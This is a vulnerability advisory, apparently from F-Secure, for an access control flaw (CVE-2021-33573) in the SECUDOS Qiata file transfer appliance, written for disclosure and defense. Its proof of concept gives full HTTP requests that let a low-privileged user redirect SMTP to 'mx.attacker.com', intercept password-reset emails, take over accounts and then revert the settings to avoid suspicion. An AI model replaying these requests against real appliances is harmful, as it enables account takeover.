SECUDOS Qiata FTA mail settings access control vulnerability

Product SECUDOS Qiata File Transfer Appliance
Severity Medium
CVE Reference CVE-2021-33573
Type Access control

Description

F-Secure identified an access control vulnerability in the Secudos Qiata File Transfer Appliance (FTA). This issue could allow a low privileged attacker to escalate their privileges on the system and gain unauthorized access to files and functionality.

Secudos describes the software as follows: “Qiata File Transfer Appliances (FTAs) provide the ability to easily and securely exchange files with internal or external users. Qiata is a user-friendly solution in the form of a specialized web application that is optimized for the task of file transfer. Qiata is not some service on the internet. Qiata is an appliance solution that operates within the enterprise itself.

F-Secure found that both low privileged internal and external users could change the SMTP settings of the FTA.

Impact

Low privileged users can escalate privileges in the system. By changing the SMTP settings to send e-mails to an attacker controlled server, the attacker can initiate a password reset for a victim user, view the reset e-mail, and subsequently change victim user’s password.

Proof of concept

In order to carry out the attack, the attacker must first be authenticated to the system. In a plausible narrative, the attacker might have received a link to a file sent from the FTA, providing an external user session on the Qiata FTA:

GET /cgi-bin/login.fcgi?link=d7d2d6c1-67f1-4f81-839a-73aca4d405b9 HTTP/1.1
Host: 192.168.17.128

The response body contains the "tokenValue" which serves as a session identifier on the FTA:

HTTP/1.1 200 OK 
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9
X-UA-Compatible: IE=EDGE
Set-Cookie: FTALink=d7d2d6c1-67f1-4f81-839a-73aca4d405b9;Path=/;Expires=Thu, 04-Mar-2021 14:46:04
GMT;HttpOnly;Secure
Set-Cookie: FTALink=d7d2d6c1-67f1-4f81-839a-73aca4d405b9;Path=/;Expires=Thu, 04-Mar-2021 14:46:04
GMT;HttpOnly;Secure
Set-Cookie: FTAUser=8ddd3e2b-73a4-4949-8173-908e38aa7f19;Path=/;Expires=Thu, 04-Mar-2021 14:46:04
GMT;HttpOnly;Secure
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
X-Permitted-Cross-Domain-Policies: master-only
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Strict-Transport-Security: max-age=31536000
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 12416

<html lang="en">
<head>
 <meta charset="utf-8">
 <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
 <link rel="shortcut icon" href="/qiata/images/favicon-blue.ico">
 <title>SECUDOS Qiata File Transfer Service - Transfer Download Seite</title>
[... omitted for brevity]
 <script>
 var tokenValue = "8ddd3e2b-73a4-4949-8173-908e38aa7f19";
[... omitted for brevity]

The attacker then fetches the SMTP settings using the following request to "/cgi-bin/transfers.fcgi" - Note that the "companyId" seems to be static across instances:

POST /cgi-bin/transfers.fcgi?isc_dataFormat=xml HTTP/1.1
Host: 192.168.17.128
Content-Length: 645
X_CSRF_Token: 8ddd3e2b-73a4-4949-8173-908e38aa7f19
Content-Type: text/xml
Accept: */*

 <request>
 <data>
 <companyId>1f0321fc-e9f5-11de-8199-00248c819310</companyId>
 </data>
 <dataSource>smtpDataSource0</dataSource>
 <operationType>fetch</operationType>
 <componentId>smtpForm1</componentId>
 <oldValues></oldValues></request>

This returns the SMTP settings including the existing SMTP server address ("smtpAddress") as seen below:

HTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
X-Permitted-Cross-Domain-Policies: master-only
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Strict-Transport-Security: max-age=31536000
Vary: Accept-Encoding
Content-Length: 558
Connection: close
Content-Type: text/xml
<?xml version="1.0" encoding="utf-8"?>
<response>
    <status>0</status>
    <startRow>0</startRow>
    <endRow>1</endRow>
    <totalRows>1</totalRows>
    <data>
      <record>
            <id>1f0321fc-e9f5-11de-8199-00248c819310</id>
            <smtpAddress>192.168.17.100</smtpAddress>
            <smtpPort>25</smtpPort>
            <smtpUserName>
            </smtpUserName>
            <smtpPassword></smtpPassword>
            <smtpTLS>false</smtpTLS>
            <senderName>FTA</senderName>
            <senderEmailAddress>fta@f-secure.com</senderEmailAddress>
            <hasSenderDomains>false</hasSenderDomains>
            <senderDomains></senderDomains>
            <testResult/>
            <isDefault>true</isDefault>
        </record>
    </data>
</response>

The SMTP settings are then updated to to send e-mails to an attacker controlled server ("mx.attacker.com"):

POST /cgi-bin/transfers.fcgi?isc_dataFormat=xml HTTP/1.1
Host: 192.168.17.128
Content-Length: 645
X_CSRF_Token: 8ddd3e2b-73a4-4949-8173-908e38aa7f19
Content-Type: text/xml
Accept: */*

<request>
    <data>
        <id>1f0321fc-e9f5-11de-8199-00248c819310</id>
        <smtpAddress>mx.attacker.com</smtpAddress>
        <senderName>FTA</senderName>
        <senderEmailAddress>fta@f-secure.com</senderEmailAddress>
        <hasSenderDomains>false</hasSenderDomains>
        <senderDomains></senderDomains>
        <testResult></testResult>
        <isDefault>true</isDefault>
        <testSMTP>false</testSMTP>
        <testSMTPFrom></testSMTPFrom>
        <testSMTPTo></testSMTPTo>
    </data>
    <dataSource>smtpDataSource0</dataSource>
    <operationType>update</operationType>
    <componentId>smtpForm1</componentId>
</request>

The 200 response code and response body returned confirms that these details have been updated:

HTTP/1.1 200 OK
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
X-Permitted-Cross-Domain-Policies: master-only
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Strict-Transport-Security: max-age=31536000
Vary: Accept-Encoding
Content-Type: text/xml
Content-Length: 491

<?xml version="1.0" encoding="utf-8"?>
<response>
    <status>0</status>
    <data>
        <record>
            <id>1f0321fc-e9f5-11de-8199-00248c819310</id>
            <smtpAddress>mx.attacker.com</smtpAddress>
            <smtpPort>25</smtpPort>
            <smtpUserName>
            </smtpUserName>
            <smtpPassword></smtpPassword>
            <smtpTLS>false</smtpTLS>
            <senderName>FTA</senderName>
            <senderEmailAdress>fta@f-secure.com
            </senderEmailAddress>
            <hasSenderDomains>false</hasSenderDomains>
            <senderDomains></senderDomains>
            <testResult>
                <![CDATA[]]>
            </testResult>
        </record>
    </data>
</response>

With the server reconfigured, the attacker can now initiate a password reset for a target user, gaining access to their account. Once the attack has concluded, the same attack vector can be used to change back the SMTP settings in order to avoid raising suspicion.

Workaround

Restricting outbound SMTP traffic from the FTA to the Internet. Only permit SMTP traffic to whitelisted destinations.

Remediation

Update the FTA to version 2.21.0.

Credits

Vulnerabilities discovered by William Söderberg of F-Secure Labs and F-Secure Consulting.

Timeline

Date Summary
2021-04-14 Notified Secudos about the identified vulnerability
2021-04-15 Vendor acknowledged issue
2021-04-26 Patch released in version 2.21.0
2021-08-24 F-Secure publishes advisory